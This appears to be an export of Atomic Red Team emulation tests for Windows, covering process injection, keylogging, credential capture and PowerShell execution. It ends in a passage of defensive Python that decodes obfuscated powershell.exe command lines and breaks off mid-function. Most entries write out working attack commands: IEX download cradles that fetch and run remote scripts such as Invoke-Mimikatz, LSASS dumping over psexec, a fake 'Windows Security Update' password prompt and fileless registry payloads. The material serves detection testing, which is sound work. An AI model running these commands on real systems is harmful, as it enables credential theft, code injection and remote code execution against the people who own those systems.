IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "#{txt_path}" -officeProduct "Word" -sub "Execute"
T1055 command_prompt windows Remote Process Injection in LSASS via mimikatz
Process Injection
Use mimikatz to remotely (via psexec) dump LSASS process content for RID 500 via code injection (new thread). Especially useful against domain controllers in Active Directory environments. It must be executed in the context of a user who is privileged on the remote machine. The effect of /inject is explained in <https://blog.3or.de/mimikatz-deep-dive-on-lsadumplsa-patch-and-inject.html>
"#{psexec_path}" /accepteula \\#{machine} -c #{mimikatz_path} "lsadump::lsa /inject /id:500" "exit"
T1055 powershell windows Section View Injection
Process Injection
This test creates a section object in the local process followed by a local section view. The shellcode is copied into the local section view, and a remote section view pointing to the same section is created in the target process. A thread is then created in the target process using the remote section view as its start address.
$notepad = Start-Process notepad -passthru
Start-Process "$PathToAtomicsFolder\T1055\bin\x64\InjectView.exe"
T1055 powershell windows Dirty Vanity process Injection
Process Injection
This test uses the undocumented Windows remote-fork API RtlCreateProcessReflection to create a cloned process of the parent process with shellcode written into its memory. The shellcode is executed after being forked into the child process. The technique was first presented at BlackHat Europe 2022. The shellcode will open a message box and a notepad.
Start-Process "$PathToAtomicsFolder\T1055\bin\x64\redVanity.exe" #{pid}
T1055 powershell elevated windows Read-Write-Execute process Injection
Process Injection
This test exploits a weakness in legitimate PE files whose sections have RWX permissions and enough space for shellcode. The RWX injection avoids the use of VirtualAlloc, WriteVirtualMemory, and ProtectVirtualMemory, thus evading detection mechanisms that rely on API call sequences and heuristics. The RWX injection uses the API call sequence LoadLibrary -- GetModuleInformation -- GetModuleHandleA -- RtlCopyMemory -- CreateThread. The injected shellcode will open a message box and a notepad. RWX Process Injection, also known as MockingJay, was introduced to the security community by SecurityJoes. More details can be found at https://www.securityjoes.com/post/process-mockingjay-echoing-rwx-in-userland-to-achieve-code-execution. The original injector and idea were developed for game cheats, as visible at https://github.com/M-r-J-o-h-n/SWH-Injector.
$address = (& "$PathToAtomicsFolder\T1055\bin\x64\searchVuln.exe" "$PathToAtomicsFolder\T1055\bin\x64\vuln_dll\" | Out-String | Select-String -Pattern "VirtualAddress: (\w+)").Matches.Groups[1].Value
& "PathToAtomicsFolder\T1055\bin\x64\RWXinjectionLocal.exe" "#{vuln_dll}" $address
T1055 powershell windows Process Injection with Go using UuidFromStringA WinAPI
Process Injection
Uses the WinAPI UuidFromStringA to load shellcode into a memory address, then executes the shellcode using EnumSystemLocalesA. With this technique, memory is allocated on the heap and commonly suspicious APIs such as VirtualAlloc, WriteProcessMemory, or CreateThread are not used. PoC Credit: https://github.com/Ne0nd0g/go-shellcode/tree/master#uuidfromstringa. References: https://research.nccgroup.com/2021/01/23/rift-analysing-a-lazarus-shellcode-execution-method/ ; https://twitter.com/_CPResearch_/status/1352310521752662018 ; https://blog.securehat.co.uk/process-injection/shellcode-execution-via-enumsystemlocala
$PathToAtomicsFolder\T1055\bin\x64\UuidFromStringA.exe -debug
T1055 powershell windows Process Injection with Go using EtwpCreateEtwThread WinAPI
Process Injection
Uses the EtwpCreateEtwThread function from ntdll.dll to execute shellcode within the application's own process. This program loads the DLLs and gets handles to the used procedures itself instead of using the windows package directly. Steps taken with this technique: 1. Allocate memory for the shellcode with VirtualAlloc, setting the page permissions to Read/Write. 2. Use the RtlCopyMemory macro to copy the shellcode to the allocated memory space. 3. Change the memory page permissions to Execute/Read with VirtualProtect. 4. Call EtwpCreateEtwThread on the shellcode address. 5. Call WaitForSingleObject so the program does not end before the shellcode is executed. PoC Credit: https://github.com/Ne0nd0g/go-shellcode/tree/master#EtwpCreateEtwThread. References: https://gist.github.com/TheWover/b2b2e427d3a81659942f4e8b9a978dc3 ; https://www.geoffchappell.com/studies/windows/win32/ntdll/api/etw/index.htm
$PathToAtomicsFolder\T1055\bin\x64\EtwpCreateEtwThread.exe -debug
T1055 powershell windows Remote Process Injection with Go using RtlCreateUserThread WinAPI
Process Injection
Executes shellcode in a remote process. Steps taken with this technique: 1. Get a handle to the target process. 2. Allocate memory for the shellcode with VirtualAllocEx, setting the page permissions to Read/Write. 3. Use WriteProcessMemory to copy the shellcode to the allocated memory space in the remote process. 4. Change the memory page permissions to Execute/Read with VirtualProtectEx. 5. Execute the entry point of the shellcode in the remote process with RtlCreateUserThread. 6. Close the handle to the remote process. PoC Credit: https://github.com/Ne0nd0g/go-shellcode/tree/master#rtlcreateuserthread. References: https://www.cobaltstrike.com/blog/cobalt-strikes-process-injection-the-details-cobalt-strike
$process = Start-Process #{spawn_process_path} -passthru
$PathToAtomicsFolder\T1055\bin\x64\RtlCreateUserThread.exe -pid $process.Id -debug
T1055 powershell windows Remote Process Injection with Go using CreateRemoteThread WinAPI
Process Injection
Leverages the Windows CreateRemoteThread function from Kernel32.dll to execute shellcode in a remote process. This application leverages functions from the golang.org/x/sys/windows package where feasible, such as windows.OpenProcess(). Steps taken with this technique: 1. Get a handle to the target process. 2. Allocate memory for the shellcode with VirtualAllocEx, setting the page permissions to Read/Write. 3. Use WriteProcessMemory to copy the shellcode to the allocated memory space in the remote process. 4. Change the memory page permissions to Execute/Read with VirtualProtectEx. 5. Execute the entry point of the shellcode in the remote process with CreateRemoteThread. 6. Close the handle to the remote process. PoC Credit: https://github.com/Ne0nd0g/go-shellcode#createremotethread. References: https://www.ired.team/offensive-security/code-injection-process-injection/process-injection
$process = Start-Process #{spawn_process_path} -passthru
$PathToAtomicsFolder\T1055\bin\x64\CreateRemoteThread.exe -pid $process.Id -debug
T1055 powershell windows Remote Process Injection with Go using CreateRemoteThread WinAPI (Natively)
Process Injection
Leverages the Windows CreateRemoteThread function from Kernel32.dll to execute shellcode in a remote process. This program loads the DLLs and gets handles to the used procedures itself instead of using the windows package directly. Steps taken with this technique: 1. Get a handle to the target process. 2. Allocate memory for the shellcode with VirtualAllocEx, setting the page permissions to Read/Write. 3. Use WriteProcessMemory to copy the shellcode to the allocated memory space in the remote process. 4. Change the memory page permissions to Execute/Read with VirtualProtectEx. 5. Execute the entry point of the shellcode in the remote process with CreateRemoteThread. 6. Close the handle to the remote process. PoC Credit: https://github.com/Ne0nd0g/go-shellcode#createremotethreadnative
$process = Start-Process #{spawn_process_path} -passthru
$PathToAtomicsFolder\T1055\bin\x64\CreateRemoteThreadNative.exe -pid $process.Id -debug
T1055 powershell windows Process Injection with Go using CreateThread WinAPI
Process Injection
This program executes shellcode in the current process using the following steps: 1. Allocate memory for the shellcode with VirtualAlloc, setting the page permissions to Read/Write. 2. Use the RtlCopyMemory macro to copy the shellcode to the allocated memory space. 3. Change the memory page permissions to Execute/Read with VirtualProtect. 4. Call CreateThread on the shellcode address. 5. Call WaitForSingleObject so the program does not end before the shellcode is executed. This program leverages the functions from golang.org/x/sys/windows to call Windows procedures instead of manually loading them. PoC Credit: https://github.com/Ne0nd0g/go-shellcode#createthread
$PathToAtomicsFolder\T1055\bin\x64\CreateThread.exe -debug
T1055 powershell windows Process Injection with Go using CreateThread WinAPI (Natively)
Process Injection
This program executes shellcode in the current process using the following steps: 1. Allocate memory for the shellcode with VirtualAlloc, setting the page permissions to Read/Write. 2. Use the RtlCopyMemory macro to copy the shellcode to the allocated memory space. 3. Change the memory page permissions to Execute/Read with VirtualProtect. 4. Call CreateThread on the shellcode address. 5. Call WaitForSingleObject so the program does not end before the shellcode is executed. This program loads the DLLs and gets handles to the used procedures itself instead of using the windows package directly. PoC Credit: https://github.com/Ne0nd0g/go-shellcode#createthreadnative
$PathToAtomicsFolder\T1055\bin\x64\CreateThreadNative.exe -debug
T1055 powershell elevated windows UUID custom process Injection
Process Injection
The UUID process injection code was first introduced by the NCC Group. The code can be stored in UUID form on the heap and converted back to binary via UuidFromStringA at runtime. In this new custom version of UUID injection, EnumSystemLocalesA is the only API called to execute the code. Custom UuidToString and UuidFromString implementations are used to avoid calling UuidFromStringA and loading RPCRT4.dll, thereby eliminating the static signatures. This technique also avoids the use of VirtualAlloc, WriteProcessMemory and CreateThread. The injected shellcode will open a message box and a notepad. Reference to NCC Group: https://research.nccgroup.com/2021/01/23/rift-analysing-a-lazarus-shellcode-execution-method/ Concept from: http://ropgadget.com/posts/abusing_win_functions.html
Start-Process "#{exe_binary}"
Start-Sleep -Seconds 7
Get-Process -Name Notepad -ErrorAction SilentlyContinue | Stop-Process -Force
T1055.001 powershell elevated windows Process Injection via mavinject.exe
Dynamic-link Library Injection
mavinject.exe is a Windows 10 utility to inject DLLs. Upon successful execution, powershell.exe will download T1055.dll to disk. PowerShell will then spawn mavinject.exe to perform process injection with T1055.dll. With default arguments, expect to see a MessageBox, with notepad's icon in the taskbar.
$mypid = #{process_id}
mavinject $mypid /INJECTRUNNING "#{dll_payload}"
Stop-Process -processname notepad
T1055.001 powershell windows WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique
Dynamic-link Library Injection
Get a SYSTEM shell: bind a SYSTEM shell using the UsoClient DLL load technique via a function of WinPwn.
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/UsoDLL/Get-UsoClientDLLSystem.ps1')
T1055.002 powershell elevated windows Portable Executable Injection
Portable Executable Injection
This test injects a portable executable into a remote Notepad process memory using Portable Executable Injection and base-address relocation techniques. When successful, a message box will appear with the title "Warning" and the content "Atomic Red Team" after a few seconds.
Start-Process "#{exe_binary}"
Start-Sleep -Seconds 7
Get-Process -Name Notepad -ErrorAction SilentlyContinue | Stop-Process -Force
T1055.003 powershell windows Thread Execution Hijacking
Thread Execution Hijacking
This test injects a MessageBox shellcode generated by msfvenom in Notepad.exe using Thread Execution Hijacking. When successful, a message box will appear with the "Atomic Red Team" caption after one or two seconds.
$notepad = Start-Process notepad -passthru
Start-Process "$PathToAtomicsFolder\T1055.003\bin\InjectContext.exe"
Start-Sleep -Seconds 5
Stop-Process $notepad.id
T1055.004 command_prompt windows Process Injection via C#
Asynchronous Procedure Call
Process injection using C#. Reference: https://github.com/pwndizzle/c-sharp-memory-injection. Exercises five techniques: 1. Process injection. 2. ApcInjectionAnyProcess. 3. ApcInjectionNewProcess. 4. IatInjection. 5. ThreadHijack. Upon successful execution, cmd.exe will execute T1055.exe, which exercises the 5 techniques. Output will be via stdout.
"#{exe_binary}"
T1055.004 powershell windows EarlyBird APC Queue Injection in Go
Asynchronous Procedure Call
Creates a process in a suspended state and calls the QueueUserAPC WinAPI to add a user APC to the child process that points to allocated shellcode. ResumeThread is then called, which in turn calls NtTestAlert to execute the queued user APC, which executes the shellcode. This technique allows for early execution of shellcode, potentially before AV/EDR can hook functions to support detection. PoC Credit: https://github.com/Ne0nd0g/go-shellcode#createprocesswithpipe. References: https://www.bleepingcomputer.com/news/security/early-bird-code-injection-technique-helps-malware-stay-undetected/ ; https://www.ired.team/offensive-security/code-injection-process-injection/early-bird-apc-queue-code-injection
$PathToAtomicsFolder\T1055.004\bin\x64\EarlyBird.exe -program "#{spawn_process_path}" -debug
T1055.004 powershell windows Remote Process Injection with Go using NtQueueApcThreadEx WinAPI
Asynchronous Procedure Call
Uses the undocumented NtQueueApcThreadEx WinAPI to create a "Special User APC" in the current thread of the current process to execute shellcode. Since the shellcode is loaded and executed in the current process, it is considered local shellcode execution. Steps taken with this technique: 1. Allocate memory for the shellcode with VirtualAlloc, setting the page permissions to Read/Write. 2. Use the RtlCopyMemory macro to copy the shellcode to the allocated memory space. 3. Change the memory page permissions to Execute/Read with VirtualProtect. 4. Get a handle to the current thread. 5. Execute the shellcode in the current thread by creating a Special User APC through the NtQueueApcThreadEx function. PoC Credit: https://github.com/Ne0nd0g/go-shellcode/tree/master#rtlcreateuserthread. References: https://repnz.github.io/posts/apc/user-apc/ ; https://docs.rs/ntapi/0.3.1/ntapi/ntpsapi/fn.NtQueueApcThreadEx.html ; https://0x00sec.org/t/process-injection-apc-injection/24608 ; https://twitter.com/aionescu/status/992264290924032005 ; http://www.opening-windows.com/techart_windows_vista_apc_internals2.htm#_Toc229652505
$PathToAtomicsFolder\T1055.004\bin\x64\NtQueueApcThreadEx.exe -debug
T1055.011 powershell windows Process Injection via Extra Window Memory (EWM) x64 executable
Extra Window Memory Injection
Hooks functions of the main process to inject a payload via the Extra Window Memory (EWM) injection technique.
#{exe_binary}
T1055.012 powershell windows Process Hollowing using PowerShell
Process Hollowing
This test uses PowerShell to create a hollowed process from a PE on disk, with explorer as the parent. Credit to FuzzySecurity (https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Start-Hollow.ps1)
. "#{script_path}"
$ppid=Get-Process #{parent_process_name} | select -expand id
Start-Hollow -Sponsor "#{sponsor_binary_path}" -Hollow "#{hollow_binary_path}" -ParentPID $ppid -Verbose
T1055.012 powershell windows RunPE via VBA
Process Hollowing
This module executes notepad.exe from within the WINWORD.EXE process.
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) 
Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1055.012\src\T1055.012-macrocode.txt" -officeProduct "#{ms_product}" -sub "Exploit"
T1055.012 powershell windows Process Hollowing in Go using CreateProcessW WinAPI
Process Hollowing
Creates a process in a suspended state, executes shellcode to spawn calc.exe in a child process, and then resumes the original process. PoC Credit: https://github.com/Ne0nd0g/go-shellcode#createprocess
$PathToAtomicsFolder\T1055.012\bin\x64\CreateProcess.exe -program "#{hollow_binary_path}" -debug
T1055.012 powershell windows Process Hollowing in Go using CreateProcessW and CreatePipe WinAPIs (T1055.012)
Process Hollowing
Create a process in a suspended state, execute shellcode to spawn calc.exe in a child process, and then resume the original process. This test uses the CreatePipe function to create an anonymous pipe that parent and child processes can communicate over. This anonymous pipe allows for the retrieval of output generated from executed shellcode. - PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createprocesswithpipe)
$PathToAtomicsFolder\T1055.012\bin\x64\CreateProcessWithPipe.exe -program "#{hollow_binary_path}" -debug
T1055.015 powershell elevated windows Process injection ListPlanting
ListPlanting
This test injects shellcode into a remote RegEdit process using the ListPlanting technique. ListPlanting abuses a window that hosts a ListView control: the code is written into the target's memory with NtWriteVirtualMemory and triggered via PostMessage. When successful, a message box will appear with the title "Warning" and the content "Atomic Red Team" after a few seconds. Notepad will open following the appearance of the message box.
Start-Process "#{exe_binary}"
Start-Sleep -Seconds 7
Get-Process -Name Notepad -ErrorAction SilentlyContinue | Stop-Process -Force
T1056.001 powershell elevated windows Input Capture
Keylogging
Utilize PowerShell and external resource to capture keystrokes [Payload](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/src/Get-Keystrokes.ps1) Provided by [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-Keystrokes.ps1) Upon successful execution, Powershell will execute Get-Keystrokes.ps1 and output to key.log.
&"$PathToAtomicsFolder\T1056.001\src\Get-Keystrokes.ps1" -LogPath #{filepath}
T1056.002 powershell windows PowerShell - Prompt User for Password
GUI Input Capture
Prompt User for Password (Local Phishing) as seen in Stitch RAT. Upon execution, a window will appear for the user to enter their credentials. Reference: https://github.com/nathanlopez/Stitch/blob/master/PyLib/askpass.py
# Creates a GUI credential prompt. Expect a long pause before the prompt is available.
$cred = $host.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName)
# Write-Warning is used so the captured password shows on the console; echo and similar commands are not visible from the Invoke-AtomicTest framework.
write-warning $cred.GetNetworkCredential().Password
T1056.004 powershell elevated windows Hook PowerShell TLS Encrypt/Decrypt Messages
Credential API Hooking
Hooks functions in PowerShell to read TLS Communications
mavinject $pid /INJECTRUNNING "#{file_name}"
Invoke-WebRequest #{server_name} -UseBasicParsing
T1057 command_prompt windows Process Discovery - tasklist
Process Discovery
Utilize tasklist to identify processes. Upon successful execution, cmd.exe will execute tasklist.exe to list processes. Output will be via stdout.
tasklist
T1057 powershell windows Process Discovery - Get-Process
Process Discovery
Utilize Get-Process PowerShell cmdlet to identify processes. Upon successful execution, powershell.exe will execute Get-Process to list processes. Output will be via stdout.
Get-Process
T1057 powershell windows Process Discovery - get-wmiObject
Process Discovery
Utilize get-wmiObject PowerShell cmdlet to identify processes. Upon successful execution, powershell.exe will execute get-wmiObject to list processes. Output will be via stdout.
get-wmiObject -class Win32_Process
T1057 command_prompt windows Process Discovery - wmic process
Process Discovery
Utilize Windows Management Instrumentation to identify processes. Upon successful execution, wmic.exe will list processes. Output will be via stdout.
wmic process get /format:list
T1057 command_prompt windows Discover Specific Process - tasklist
Process Discovery
Adversaries may use command line tools to discover specific processes in preparation of further attacks. Examples of this could be discovering the PID of lsass.exe to dump its memory or discovering whether specific security processes (e.g. AV or EDR) are running.
tasklist | findstr #{process_to_enumerate}
T1057 powershell elevated windows Process Discovery - Process Hacker
Process Discovery
Process Hacker can be abused to inspect and manipulate system processes, identify weak points, or gain unauthorized control over a system. Its malicious use is often flagged by security defenses, which makes it a risky tool for an adversary.
Start-Process -FilePath "$Env:ProgramFiles\Process Hacker 2\#{processhacker_exe}"
T1057 powershell elevated windows Process Discovery - PC Hunter
Process Discovery
PC Hunter is a toolkit with access to hundreds of settings including kernels, kernel modules, processes, network, startup, and more. When abused, this tool can allow threat actors to effectively access sensitive processes, collect system information, and terminate security software.
Start-Process -FilePath "C:\Temp\ExternalPayloads\PCHunter_free\#{pchunter64_exe}"
T1057 command_prompt windows Launch Taskmgr from cmd to View running processes
Process Discovery
An adversary may launch taskmgr.exe with the /7 switch via the command prompt to view processes running on the system. [Reference](https://github.com/trellix-enterprise/ac3-threat-sightings/blob/main/sightings/Sightings_Conti_Ransomware.yml)
taskmgr.exe /7
T1059 powershell windows AutoIt Script Execution
Command and Scripting Interpreter
An adversary may attempt to execute a suspicious or malicious script using AutoIt instead of a conventional interpreter such as PowerShell or cmd. Calculator will pop up when the script is executed successfully.
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
T1059.001 command_prompt elevated windows Mimikatz
PowerShell
Download Mimikatz and dump credentials. Upon execution, mimikatz dump details and password hashes will be displayed.
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
T1059.001 powershell windows Run BloodHound from local disk
PowerShell
Upon execution SharpHound will be downloaded to disk (as a prerequisite), imported and executed. It will set up collection methods, run, and then compress and store the data in the temp directory on the machine. If the system is unable to contact a domain, proper execution will not occur. Successful execution will produce a stdout message stating "SharpHound Enumeration Completed". Upon completion, the final output will be a *BloodHound.zip file.
import-module "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
try { Invoke-BloodHound -OutputDirectory $env:Temp }
catch { $_; exit $_.Exception.HResult}
Start-Sleep 5
T1059.001 powershell windows Run Bloodhound from Memory using Download Cradle
PowerShell
Upon execution SharpHound will load into memory and execute against a domain. It will set up collection methods, run, and then compress and store the data in the temp directory. If the system is unable to contact a domain, proper execution will not occur. Successful execution will produce a stdout message stating "SharpHound Enumeration Completed". Upon completion, the final output will be a *BloodHound.zip file.
write-host "Remote download of SharpHound.ps1 into memory, followed by execution of the script" -ForegroundColor Cyan
IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5
T1059.001 powershell elevated windows Mimikatz - Cradlecraft PsSendKeys
PowerShell
Run mimikatz via PsSendKeys. Upon execution, automated actions will take place to open file explorer, open notepad and input code, then mimikatz dump info will be displayed.
$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
T1059.001 command_prompt windows Invoke-AppPathBypass
PowerShell
Note: Windows 10 only. Upon execution, the Windows Backup and Restore window will be opened. The bypass is based on: https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
T1059.001 command_prompt windows Powershell MsXml COM object - with prompt
PowerShell
PowerShell download cradle using the MsXml2.ServerXmlHttp COM object. Not proxy aware; the test removes the cache, although the object does not appear to write to those locations. Upon execution, "Download Cradle test success!" will be displayed. Provided by https://github.com/mgreen27/mgreen27.github.io
powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
T1059.001 command_prompt windows Powershell XML requests
PowerShell
PowerShell XML download request. Upon execution, "Download Cradle test success!" will be displayed. Provided by https://github.com/mgreen27/mgreen27.github.io
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
T1059.001 command_prompt windows Powershell invoke mshta.exe download
PowerShell
Powershell invoke mshta to download payload. Upon execution, a new PowerShell window will be opened which will display "Download Cradle test success!". Provided by https://github.com/mgreen27/mgreen27.github.io
C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"
T1059.001 manual windows Powershell Invoke-DownloadCradle
PowerShell
Provided by https://github.com/mgreen27/mgreen27.github.io Invoke-DownloadCradle is used to generate Network and Endpoint artifacts.
T1059.001 powershell windows PowerShell Fileless Script Execution
PowerShell
Execution of a PowerShell payload from the Windows Registry, similar to that seen in fileless malware infections. Upon execution, open "C:\Windows\Temp" and verify that art-marker.txt is in the folder.
# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
T1059.001 powershell windows NTFS Alternate Data Stream Access
PowerShell
Creates a file with an alternate data stream and simulates executing that hidden code/file. Upon execution, "Stream Data Executed" will be displayed.
Add-Content -Path #{ads_file} -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'
Invoke-Expression $streamcommand
T1059.001 powershell elevated windows PowerShell Session Creation and Use
PowerShell
Connect to a remote powershell session and interact with the host. Upon execution, network test info and 'T1086 PowerShell Session Creation and Use' will be displayed.
New-PSSession -ComputerName #{hostname_to_connect}
Test-Connection $env:COMPUTERNAME
Set-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use -Value "T1086 PowerShell Session Creation and Use"
Get-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
Remove-Item -Force $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
T1059.001 powershell windows ATHPowerShellCommandLineParameter -Command parameter variations
PowerShell
Executes powershell.exe with variations of the -Command parameter
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -Execute -ErrorAction Stop
T1059.001 powershell windows ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments
PowerShell
Executes powershell.exe with variations of the -Command parameter with encoded arguments supplied
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
T1059.001 powershell windows ATHPowerShellCommandLineParameter -EncodedCommand parameter variations
PowerShell
Executes powershell.exe with variations of the -EncodedCommand parameter
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute -ErrorAction Stop
T1059.001 powershell windows ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments
PowerShell
Executes powershell.exe with variations of the -EncodedCommand parameter with encoded arguments supplied
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
T1059.001 command_prompt windows PowerShell Command Execution
PowerShell
Use of obfuscated PowerShell to execute an arbitrary command; outputs "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report by Red Canary.
powershell.exe -e  #{obfuscated_code}
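The four ATHPowerShellCommandLineParameter tests and the obfuscated -e example above exist because powershell.exe accepts many spellings of the same switch, so a detection keyed on the literal string -EncodedCommand misses -e, -ec, /Ec or -encodedcom. The following Python is an added example, not AtomicTestHarness or Atomic Red Team code: it resolves switch abbreviations the way the console host does (case-insensitive, - or /, any prefix of the full name that is at least the parser's minimum, plus the short forms -ec, -ep and -ea; the -ea short form is included as an assumption), decodes -EncodedCommand and -EncodedArguments (both base64 of UTF-16LE text) and returns the plain command so a rule can match on it. The sample command lines are constructed; the bare-argument-as-Command rule is Windows PowerShell 5.1 behaviour (pwsh treats a bare argument as -File).

```python
"""Normalize powershell.exe command lines: resolve abbreviated and alternate
switch spellings and decode -EncodedCommand / -EncodedArguments payloads.

Added example, not AtomicTestHarness or Atomic Red Team code. The switch
table and sample command lines are assumptions/constructed inputs.
"""
import base64

# (accepted name, minimum prefix, canonical switch), in the order the parser checks them.
# "-Ec", "-ep", "-ea" are the short forms the console host also accepts.
SWITCHES = [
    ("encodedcommand", "e", "encodedcommand"),
    ("ec", "e", "encodedcommand"),
    ("encodedarguments", "encodeda", "encodedarguments"),
    ("ea", "ea", "encodedarguments"),
    ("command", "c", "command"),
    ("file", "f", "file"),
    ("noprofile", "nop", "noprofile"),
    ("noninteractive", "noni", "noninteractive"),
    ("nologo", "nol", "nologo"),
    ("noexit", "noe", "noexit"),
    ("executionpolicy", "ex", "executionpolicy"),
    ("ep", "ep", "executionpolicy"),
    ("windowstyle", "w", "windowstyle"),
]
TAKES_VALUE = {"encodedcommand", "encodedarguments", "file", "executionpolicy", "windowstyle"}


def encode_command(script):
    """Produce what -EncodedCommand expects: base64 of the UTF-16LE script text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_utf16_b64(blob):
    """Inverse of encode_command; None when the blob is not valid base64/UTF-16LE."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def split_cmdline(cmdline):
    """Minimal Windows-style split: whitespace separates, double quotes group."""
    tokens, current, in_quotes = [], [], False
    for ch in cmdline:
        if ch == '"':
            in_quotes = not in_quotes
        elif ch.isspace() and not in_quotes:
            if current:
                tokens.append("".join(current))
                current = []
        else:
            current.append(ch)
    if current:
        tokens.append("".join(current))
    return tokens


def resolve_switch(token):
    """Map '-Ec', '/NoP', '-encodedcom' ... to a canonical switch name, else None."""
    if len(token) < 2 or token[0] not in "-/":
        return None
    name = token[1:].lower()
    for accepted, minimum, canonical in SWITCHES:
        if accepted.startswith(name) and name.startswith(minimum):
            return canonical
    return None


def normalize_powershell_cmdline(cmdline):
    tokens = split_cmdline(cmdline)
    result = {"exe": tokens[0] if tokens else "", "switches": {},
              "command": None, "encoded": False, "arguments": None}
    i = 1
    while i < len(tokens):
        switch = resolve_switch(tokens[i])
        if switch is None:
            result["command"] = " ".join(tokens[i:])   # 5.1: bare argument is -Command text
            break
        if switch == "command":
            rest = tokens[i + 1:]                      # everything after -Command is the command
            result["command"] = "<stdin>" if rest == ["-"] else " ".join(rest)
            break
        if switch in TAKES_VALUE and i + 1 < len(tokens):
            value = tokens[i + 1]
            if switch == "encodedcommand":
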